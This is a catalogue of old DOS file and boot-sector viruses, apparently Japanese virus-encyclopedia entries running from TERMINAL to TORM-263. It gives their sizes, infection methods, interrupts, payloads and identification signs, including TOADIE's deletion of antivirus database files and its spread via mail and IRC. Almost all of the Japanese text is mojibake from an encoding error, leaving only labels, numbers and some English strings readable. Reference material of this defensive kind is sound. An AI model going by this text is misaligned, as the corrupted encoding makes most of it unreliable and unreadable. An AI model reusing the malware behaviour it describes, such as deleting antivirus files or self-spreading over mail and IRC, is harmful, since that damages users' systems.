¥Þ¥ó¥É¤Ç¤Ï³Îǧ¤Ç¤­¤Ê¤¤¡£¤Þ¤¿´¶À÷¥Õ¥¡¥¤¥ë¤Î¥¿¥¤¥à¥¹¥¿ ¥ó¥×¤Ï¹¹¿·¤µ¤ì¤Ê¤¤¡£ ¡Ý³èư¥á¥«¥Ë¥º¥à¤ä²¿¤¬³èư¤Î°ú¤­¶â¤È¤Ê¤ë¤Î¤«ÉÔÌÀ¡£
È÷¡¡¡¡¹Í:

TERMINAL


̾¡¡¡¡¾Î:TERMINAL

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM;.EXE

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:

¥É¥é¥¤¥ÖC:¤Ë¤¢¤ë¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î̤´¶À÷.EXE¥Õ
¥¡¥¤¥ë¤òõ¤·½Ð¤·¤Æ´¶À÷¤¹¤ë¡£
Ç˲õ:
¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤ò¥¦¥¤¥ë¥¹¥³¡¼¥É¤Ç¾å½ñ¤­¤¹¤ë¤Î¤Ç¡¢ ¥Õ¥¡¥¤¥ë¤¬Ç˲õ¤µ¤ì¤ë¡£
È÷¡¡¡¡¹Í: 1¡Ë¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ
¤ß¶Ø»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é ¡¼¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ 2¡Ë¹âµé¸À¸ì¤Ç½ñ¤«¤ì¤Æ¤¤¤ë¡£ 3¡Ë¤³¤Î¥¦¥¤¥ë¥¹¤ÏPKLITE¤Î¤è¤¦¤Ê¥×¥í¥°¥é¥à¤Ë¤è¤Ã¤Æ°Å ¹æ²½¤µ¤ì¤Æ¤¤¤ë¡£

TEST01


̾¡¡¡¡¾Î:TEST01

THELMATO-B


̾¡¡¡¡¾Î:THELMATO-B

ʬ¡¡¡¡Îà:¥·¥¹¥Æ¥àÎΰ贶À÷·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:512bytes

¾Ü¡¡¡¡ºÙ:¤³¤ì¤Ï¥á¥â¥ê¾ïÃ󷿤Υ¦¥¤¥ë¥¹¤Ç¤¢¤ë¡£´¶À÷¤·
¤¿¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Ç¥Þ¥·¥ó¤òµ¯Æ°¤¹¤ë¤È¡¢¥Ï¡¼¥É¥Ç¥£ ¥¹¥¯¤ÎMBR¤Ë´¶À÷¤·¡¢µ¯Æ°»þ¤Ë¥á¥â¥ê¤Ë¾ïÃ󤷤ơ¢Ì¤´¶À÷¤Î ¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿¤Ë´¶À÷¤·¤Æ¤¤¤¯¡£°Å¹æ ²½¥ë¡¼¥Á¥ó¤Ê¤É¤Ï»ý¤Ã¤Æ¤¤¤Ê¤¤¡£ Ç˲õ³èưÅù¤Ï¤Ê¤¤¡£¤³¤Î¥¦¥¤¥ë¥¹¤Î¼çÌÜŪ¤Ï¡¢´¶À÷¡¦Áý¿£ ¤·¤Æ¤¤¤¯¤³¤È¤Ç¤¢¤ë¡£

THREE_TUNES


̾¡¡¡¡¾Î:THREE_TUNES

ÊÌ¡¡¡¡Ì¾:FLIPޤ PCBB.1784ޤ 3TUNES.1784ޤ THREE_TUNES.
1784.Aޤ THREETUNESޤ THREE TUNES.1784ޤ 1784
ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1784bytes

¾Ü¡¡¡¡ºÙ:¾É ¾õ: ¶Ê¤¬ºÆÀ¸¤µ¤ì¤Þ¤¹¡£

Ç˲õ³èư: ¤Ê¤·

ȯɾò·ï: ¤Ê¤·

¥Ñ¥¹¥ï¡¼¥É: ¤Ê¤·

¥æ¡¼¥¶´¶À÷Îã: ¤¢¤ê

³ä¤ê¹þ¤ß: Int 21h¡¢Int 1Ch

´¶À÷ÊýË¡:

¾å°Ì¥á¥â¥ê¤Ë¿¯Æþ¤·¡¢2304¥Ð¥¤¥È¡Ê9F70:0000¡Ë¤ò¥¢¥í¥±
¡¼¥È¤·¤Þ¤¹¡£ *.EXE¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤·¤Þ¤¹¡£¥¦¥¤¥ë¥¹¥³¡¼¥É¤ò½É¼ç¥×¥í ¥°¥é¥à¤Ë¥³¥Ô¡¼¤·¡¢Ìó1784¥Ð¥¤¥È¤òÄɲä·¤Þ¤¹¡£½É¼ç¥×¥í ¥°¥é¥à¤Î¼Â¹ÔÁ°¤Ë¡¢¥¦¥¤¥ë¥¹¤ò¤Þ¤ººÇ½é¤Ë¥í¡¼¥É¤· ¤Þ ¥á¥â¥ê¤Ë¾ïÃ󤹤ë¤È¡¢¥¦¥¤¥ë¥¹¤Ï¼Â¹Ô¤µ¤ì¤ë¤¹¤Ù¤Æ¤Î*.EXE ¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤·¤Þ¤¹¡£ÆÃÉ®¤¹¤Ù¤­¤³¤È¤Ï²¿¤â¤·¤Þ¤»¤ó¡£ ¥á¥â¥ê¤Ë¾ïÃ󤹤ë¤È¼«¸ÊÁý¿£¤¹¤ë¤À¤±¤Ç¤¹¡£¼Â¹Ô¤µ¤ì¤ë ¥Õ¥¡¥¤¥ë¤À¤±¤Ë´¶À÷¤·¤Þ
¥À¥á¡¼¥¸:
¥Õ¥ê¡¼¥á¥â¥ê¤¬Ìó2304¥Ð¥¤¥È¸º¾¯¤·¤Þ¤¹¡£ ¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤¬Áý²Ã¤·¤Þ¤¹¡£ÄɲäÏÌó1784¥Ð¥¤¥È¤Ç¤¹¡£
Ãí¡¡¡¡°Õ:
¤³¤Î¥¦¥¤¥ë¥¹¤Ï¡¢Int 21¡Ê2A¡Ë¤ò»ÈÍѤ·¤Æ¡¢¸½¹Ô·î¤¬6·î¤« ¤É¤¦¤«¤ò¤Þ¤º¥Á¥§¥Ã¥¯¤·¤Þ¤¹¡£6·î¤Ç¤¢¤ì¤Ð¡¢¥¦¥¤¥ë¥¹¥³ ¡¼¥É¤òµ¯Æ°¤·¤Þ¤¹¡£¤½¤ì°Ê³°¤Î·î¤Ê¤é¡¢Ã±¤Ë¥×¥í¥° ¥é¥à¤ò½ªÎ»¤·¤Þ¤¹¡£¼¡¤Ë¡¢Int 21¡Ê2C¡Ë¤ò»ÈÍѤ·¤Æ¥·¥¹¥Æ ¥à»þ¹ï¤ò¥Á¥§¥Ã¥¯¤·¤Þ¤¹¡£¥¦¥¤¥ë¥¹¤Ï¡¢¼Â¹Ô¤¹¤ëȯÉÂ¥ë ¡¼¥Á¥ó¤òÁªÂò¤¹¤ë¤¿¤á¤ÎÆÃ¼ì¤Ê¸ø¼°¤ò»ÈÍѤ·¤Þ¤¹¡£²Äǽ À­¤Î¤¢¤ëȯÉ¥롼¥Á¥ó¤Ï4¤Ä¤¢¤ê¡¢¤³¤ì¤Ë¤Ä¤¤¤Æ¤Ï¸å¤ÇÀâÌÀ ¤·¤Þ¤¹¡£¤³¤³¤Ç¤Ï¤Þ¤º¡¢¸ø¼°¤À¤±¤ò¼¨¤·¤Þ
Int 21¡Ê2C¡Ë:
Í­°Õ¥ì¥¸¥¹¥¿CXޤCH¤òCL¤Ë²Ã»»¤·¹ç·×¤òCL¤ËÌ᤹¡ÊAdd CLޤ CH¡Ë AND ¥Ö¡¼¥ë±é»»¤òCLޤ03 ´Ö¤Ë»ÈÍÑ¡ÊAnd CLޤ03¡Ë CH¤ò00¤Ë¥¯¥ê¥¢ ¡ÊXOR CHޤCH¡Ë Cl¤ò4¤Ä¤Î²Äǽ¹àÌܤÈÈæ³Ó¡ÊCMP CLޤ+03¡Ë ¥¦¥¤¥ë¥¹¤Ï¡¢¤³¤Î¼ê½ç¤ò»ÈÍѤ·¤Æ¡¢CLÍѤÎÃͤȤ·¤Æ00¡¢ 01¡¢02¡¢03¤ò¼èÆÀ¤·¤Þ¤¹¡£³ÆÃͤϡ¢ÆÃÄê¤ÎÀûΧ¤ËÂбþ¤·¤Æ ¤¤¤Þ¤¹¡Ê03¤Ë¤Ï±éÁÕ¤¹¤ëÀûΧ¤Ï¤¢¤ê¤Þ¤»¤ó¡Ë¡£´¶À÷ ¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢»þ¹ï¤È»þ¹ï¤òÁàºî¤·¤¿·ë²Ì¤Ë´ð ¤Å¤¤¤Æ¡¢ÆÃÄê¤ÎÀûΧ¤¬±éÁÕ¤µ¤ì¤Þ¤¹¡£±éÁÕ¤µ¤ì¤ëÀûΧ¤Ï¹ç ·×3¤Ä¤Ç¤¹¡£¤É¤ÎÀûΧ¤¬±éÁÕ¤µ¤ì¤Æ¤â¡¢²¿¤â±éÁÕ¤µ¤ì¤Ê¤¤¾ì ¹ç ¤Ç¤â¡¢´¶À÷¤Î¾õ¶·¤ÏƱ¤¸¤Ç
¾É¡¡¡¡¾õ:
1) ¥¦¥¤¥ë¥¹³èư¤Î¤¿¤á¤Ë¥×¥í¥°¥é¥à¤Î¼Â¹Ô®ÅÙ¤¬Äã²¼¤·¤Þ ¤¹¡£ 2) ³Æ¼ï¤ÎÀûΧ¤¬±éÁÕ¤µ¤ì¤Þ¤¹¡£
È÷¡¡¡¡¹Í:

THULE


̾¡¡¡¡¾Î:THULE

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:309¥Ð¥¤¥È(.COM)¡¢68¥Ð¥¤¥È(¥á¥â¥ê¡Ë

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃó¤·¡¢"THULE.COM" ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤òºï½ü¤¹ ¤ë¡£ DOS ¤¬¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥ê¤òÊѹ¹¤¹¤ë¤È¡¢ Êѹ¹¤·¤¿¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥ê¾å¤Ç "THULE.COM" ¤ò¸¡º÷¤· ºï½ü¤¹¤ë¡£
Ç˲õ:"THULE.COM" ¤È¤¤¤¦¥Õ¥¡¥¤¥ë¤¬ºï½ü¤µ¤ì¤ë¡£

ÆÃħ:¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤¬Áý²Ã¤¹¤ë¡£¥Õ¥¡¥¤¥ë¤¬ºï½ü¤µ¤ì
¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21h

È÷¡¡¡¡¹Í:

TIMEMARK


̾¡¡¡¡¾Î:TIMEMARK

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1060¡Á1080¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¡¢¾å°Ì¥á¥â¥ê¤Ë¾ïÃ󤹤롣 ¾ïÃó¸å¡¢¥ª¥ê¥¸¥Ê¥ë¥ë¡¼¥Á¥ó¤ËÌá¤ë¡£ ̤´¶À÷¤Î.EXE¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ëÅ٤˴¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21H

Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

¼±ÊÌÊýË¡:´¶À÷¥Õ¥¡¥¤¥ë¤Ï1060-1080¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£

È÷¡¡¡¡¹Í:

TIMID


̾¡¡¡¡¾Î:TIMID

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:306¥Ð¥¤¥È¡Ê.COM¡Ë

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
1¡Ë¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î.COM¥Õ¥¡¥¤¥ë¤òõ¤¹¡£ 2¡Ë¤¹¤Ç¤ËTimid¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤Æ¤¤¤ì¤Ð¡¢Â¾¤Î̤´¶À÷. COM¥Õ¥¡¥¤¥ë¤òõ¤¹¡£ 3¡Ë¼¡¤Ë¡¢¥Õ¥¡¥¤¥ë¤Ë1¤Ä¤º¤Ä´¶À÷¤·¤Æ¤¤¤­¡¢²èÌ̤˴¶À÷¥Õ ¥¡¥¤¥ë̾¤òɽ¼¨¤¹¤ë¡£ 4¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥·¥¹¥Æ¥à¤¬¥Ï¥ó¥°¤¹¤ë¡£
Ç˲õ:¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤òÇ˲õ¤¹¤ë¡£

¼±ÊÌÊýË¡:
1¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤Ï306¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£ 2¡Ë¾¤Î¥Õ¥¡¥¤¥ë̾¤¬²èÌ̤Ëɽ¼¨¤µ¤ì¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:¤Ê¤·

È÷¡¡¡¡¹Í:¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß¶Ø
»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TINY-124


̾¡¡¡¡¾Î:TINY-124

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM;.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:124¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¾ïÃ󤹤롣 ¾ïÃó¸å¡¢¥ª¥ê¥¸¥Ê¥ë¥ë¡¼¥Á¥ó¤ËÌá¤ë¡£ ̤´¶À÷¤Î.COM¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ëÅ٤˴¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21H

Ç˲õ:
´¶À÷¸å¡¢¥Ø¥Ã¥À¤¬Â»½ý¤ò¼õ¤±¤ë¤Î¤Ç.EXE¥Õ¥¡¥¤¥ë¤ÏÇ˲õ¤µ ¤ì¤ë¡£
¼±ÊÌÊýË¡:
1¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤ÎÆüÉդȻþ¹ï¤ÏÊѹ¹¤µ¤ì¤Ê¤¤¡£ 2¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤Ï124¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£
È÷¡¡¡¡¹Í:

TINY-143


̾¡¡¡¡¾Î:TINY-143

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:143¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¾ïÃ󤹤롣 ¾ïÃó¸å¡¢¥ª¥ê¥¸¥Ê¥ë¥ë¡¼¥Á¥ó¤ËÌá¤ë¡£ ̤´¶À÷¤Î.COM¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ëÅ٤˴¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21H

Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

¼±ÊÌÊýË¡:
1¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤ÎÆüÉդȻþ¹ï¤Ï¹¹¿·¤µ¤ì¤Ê¤¤¡£ 2¡Ë´¶À÷¥Õ¥¡¥¤¥ë¤Ï143¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£
È÷¡¡¡¡¹Í:

TOADIE.CCE


̾¡¡¡¡¾Î:TOADIE.CCE

ÊÌ¡¡¡¡Ì¾:HLLT.TOADIE.7800

¸À¡¡¡¡¸ì:English

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:EXE(DOS / Windows)

¥¦¥¤¥ë¥¹¥µ¥¤¥º:7800 bytes

¾Ü¡¡¡¡ºÙ:¤³¤Î¥¦¥¤¥ë¥¹¤ÏDOSÍѤÎEXE¥Õ¥¡¥¤¥ë¤À¤±¤Ç¤Ê
¤¯¡¢WindowsÍÑ¥Õ¥¡¥¤¥ë¤Ë¤â´¶À÷¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¡£¼Â¹Ô¤¹ ¤ë¤È¡¢¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥ê¤ÎEXE¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£¤³ ¤Î¥¦¥¤¥ë¥¹¤Ï¾å½ñ¤­´¶À÷·¿¤Î¤¿¤á¡¢´¶À÷¤·¤¿¥Õ¥¡¥¤¥ë¤ò¥¢ ¥ó¥Á¥¦¥¤¥ë¥¹¥½¥Õ¥È¤ò»È¤Ã¤Æ½¤Éü¤¹¤ë¤³¤È¤Ï¤Ç¤­¤Ê¤¤¡£ TOADIE.CCE¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢°Ê ²¼¤Î¥Õ¥¡¥¤¥ë̾¤ò»ý¤Ä¥Õ¥¡¥¤¥ë¤ò¾Ãµî¤¹¤ë¡£¤³¤ì¤é¤Ï¥¢¥ó ¥Á¥¦¥¤¥ë¥¹¥½¥Õ¥È¤Î¥Ç¡¼¥¿¥Ù¡¼¥¹¥Õ¥¡¥¤¥ë¤È¤·¤Æ»ÈÍѤµ¤ì ¤Æ¤¤¤ë̾¾Î¤Ç¤¢¤ë¡£ anti-virus.dat chklist.ms chklist.cps vs.vsn ivb.ntz ¤Þ¤¿¡¢´¶À÷¤·¤¿¥Õ¥¡¥¤¥ë¤¬¡¢Ëè»þ´Ö17ʬ°Ê¹ß¤Ë ¼Â¹Ô¤µ¤ì¤ë¤È¡¢DOS¥×¥í¥ó¥×¥È¤Ç°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹ ¤ë¡£ ¡ÈTOADiE v1.2 - Raid [SLAM] ¡ãIt¡Çs time for a reinstall... HeHeHe¡ä¡É
¾É¾õ:
¤â¤·¡¢¥Þ¥·¥ó¤Ë¡¢Pegasus Mail¤¬¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤ë ¤È¡¢¥æ¡¼¥¶¡¼¤¬¥á¡¼¥ë¤òÁ÷¿®¤·¤¿¤È¤­¤Ë¼«Æ°Åª¤Ë¥¦¥¤¥ë¥¹ ¥Õ¥¡¥¤¥ë¤òźÉÕ¤·¤ÆÁ÷¿®¤·¤Æ¤·¤Þ¤¦¡£ ¤Þ¤¿¡¢Internet Relay Chat¡ÊIRC¡Ë·Ðͳ¤Ç¥¦¥¤¥ë¥¹¤ò³È»¶
¤¹¤ë¡£C:\MIRC¥Ç¥£¥ì¥¯¥È¥ê¤Ë¡¢¡ÉSCRIPT.INI¡É¤È¤¤¤¦¥Õ¥¡
¥¤¥ë̾¤ÇIRCÍѤΥ¹¥¯¥ê¥×¥È¥Õ¥¡¥¤¥ë¤È¡¢"TOADIE.EXE"¤È¤¤ ¤¦Ì¾Á°¤Ç¥¦¥¤¥ë¥¹¼«¿È¤ÎÊ£À½¤òºîÀ®¤¹¤ë¡£¤½¤·¤ÆÃ¯¤«¤¬ mIRC¥Á¥ã¥ó¥Í¥ë¤Ë»²²Ã¤·¤Æ¤­¤¿¤È¤­¡¢¤½¤Î¿Í¤ËÂФ·¤Æ¤³¤Î ¥Õ¥¡¥¤¥ë¤ò¡ÉDCC¡É¡Ê¥Õ¥¡¥¤¥ë¤òÁ÷¿®¡Ë¤¹¤ë¡£ mIRC¤äPegasus Mail¤Ç½é¤á¤ÆTOADIE.CCE¥¦¥¤¥ë¥¹¤ò¼õ¤±¼è ¤ë¤È¡¢DOS¥×¥í¥ó¥×¥È¤Ç°Ê²¼¤Î£µ¤Ä¤Î¥á¥Ã¥»¡¼¥¸¤Î¤¦¤Á¤É¤ì ¤«°ì¤Ä¤¬É½¼¨¤µ¤ì¤ë¡£ There once was a bud named B.C. He grew on a 7 foot tree Till one day I plucked him Rolled him and smoked him And now I can barely see! Ladies and gentlemen, I stand before you to stand behind you to tell you something I know nothing about. Thursday, which is Good Friday, we¡Çre having a Father¡Çs Day party for mothers only. Admission is free, pay at the door, pull out a chair and sit on the floor. Late one night in the middle of the day, two dead soldiers got up to fight. Back to back they faced each other, pulled out their swords and shot one another. A deaf policeman heard the noise, got up and shot the twice dead boys.If you don¡Çt believe me, ask the blind man who saw it all, through a knothole in a wooden brick wall.
Question: If someone with multiple personalities
tries to commit suicide, do the police consider it a hostage situation? One bong hit, Two bong hit, Three bong hit, Floor. ¤³¤Î¥¦¥¤¥ë¥¹¤Ï¸á¸å3»þ¤«¤é5»þ¤Þ¤Ç¤Î´Ö¤Ï¾¤Î¥Õ¥¡¥¤¥ë¤Ë ´¶À÷¤·¤Ê¤¤¡£¤Þ¤¿¡¢´¶À÷¤·¤¿EXE¥Õ¥¡¥¤¥ë¤Ï¡¢¸á¸å9»þ¤«¤é 12»þ¤Þ¤Ç¤Î´Ö¤Ïưºî¤·¤Ê¤¤¡£

TOPA_V1.2


̾¡¡¡¡¾Î:TOPA_V1.2

ʬ¡¡¡¡Îà:¥·¥¹¥Æ¥àÎΰ贶À÷·¿

ÂС¡¡¡¾Ý:.COM;.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:2456¡Á2471¥Ð¥¤¥È(.EXE)¡¢2456¥Ð¥¤¥È

ȯ¾ÍÃÏ:(.COM)¡¢5536¥Ð¥¤¥È(¥á¥â¥ê¡Ë

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:[

´¶À÷ÊýË¡:
´¶À÷¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È´¶À÷¤¹¤ë¡£ TOPA_1.2¤Ë´¶À÷¤·¤¿¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥á¥â¥ê¤Ë¾ï Ã󤷤Ƥ¤¤ë¤«¥Á¥§¥Ã¥¯¤¹¤ë¡£¤¹¤Ç¤Ë¾ïÃ󤷤Ƥ¤¤ì¤Ð¡¢¥ª¥ê ¥¸¥Ê¥ë¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¡£ ¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¼¡¤Î»ö¤ò¼Â¹Ô¤¹¤ë¡£ 1¡ËMCB¡Ê¥á¥â¥ê¥³¥ó¥È¥í¡¼¥ë¥Ö¥í¥Ã¥¯¡Ë¤Ë¾ïÃ󤹤롣 »ÈÍѲÄǽ¤Ê¥Õ¥ê¡¼¥á¥â¥ê¤¬ 5536(15A0H)¥Ð¥¤¥È¸º¾¯¤¹ ¤ë¡£ 2¡Ë¥á¥â¥ê¤Ë¾ïÃ󤹤ë¤È´¶À÷¤¹¤ë¡£
ÆÃħ:¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤¬Áý²Ã¤¹¤ë¡£

»ÈÍѳä¤ê¹þ¤ßÌ¿Îá: INT 1Ch¡¢INT 21h

È÷¡¡¡¡¹Í:

TOPO


̾¡¡¡¡¾Î:TOPO

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1536¡Á1552¥Ð¥¤¥È(.EXE)¡¢3616¥Ð¥¤¥È(¥á
¥â¥ê¡Ë
ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
´¶À÷¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È´¶À÷¤¹¤ë¡£ TOPO¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¤È¡¢¤Þ¤º¥¦ ¥¤¥ë¥¹¼«ÂΤò±£¤¹¡£ ¼¡¤Ë¡¢¥¦¥¤¥ë¥¹¤¬¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤ë¤«¥Á¥§¥Ã¥¯¤¹¤ë¡£ ¤¹¤Ç¤Ë¾ïÃ󤷤Ƥ¤¤ì¤Ð¥ª¥ê¥¸¥Ê¥ë¥×¥í¥°¥é¥à¤ò¼Â¹Ô¤¹¤ë¡£ "*AN.EXE" ¤ä "*LD.EXE" ¤È¤¤¤¦Ì¾Á°¤Î¥Õ¥¡¥¤¥ë¤Ë¤Ï´¶À÷¤· ¤Ê¤¤¡£
Ç˲õ:¥Ç¥£¥¹¥¯¤òÇ˲õ¤·¡¢°Ê²¼¤Î¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£
"R(etry)ޤ I(gnore)ޤ F(ail)ޤ or A(bort¡Ë?"
ÆÃħ:
¥Õ¥¡¥¤¥ë¥µ¥¤¥º¤¬Áý²Ã¤·¡¢¥Õ¥¡¥¤¥ë¤Î¤¤¤¯¤Ä¤«¤ÏÆÉ¤ß¹þ¤á ¤Ê¤¯¤Ê¤ë¡£ ¶õ¤­¥á¥â¥ê¤¬¸º¾¯¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21h

È÷¡¡¡¡¹Í:¥·¥¹¥Æ¥à¤ÎÆüÉÕ¤¬25¤«26Æü¤Ëȯɤ·¡¢¾åµ­¥á¥Ã
¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TORM-263


̾¡¡¡¡¾Î:TORM-263

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:263¥Ð¥¤¥È¡Ê.COM¡Ë

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
1¡Ë¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î.COM¥Õ¥¡¥¤¥ë¤òõ¤¹¡£ 2¡Ë¤¹¤Ç¤Ë TORM-263¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤Æ¤¤¤ì¤Ð¡¢Â¾¤Î̤´¶ À÷.COM¥Õ¥¡¥¤¥ë¤òõ¤¹¡£ 3¡Ë¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î̤´¶À÷¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£ 4¡ËºÇ¸å¤Ë¡¢¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¡£
Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

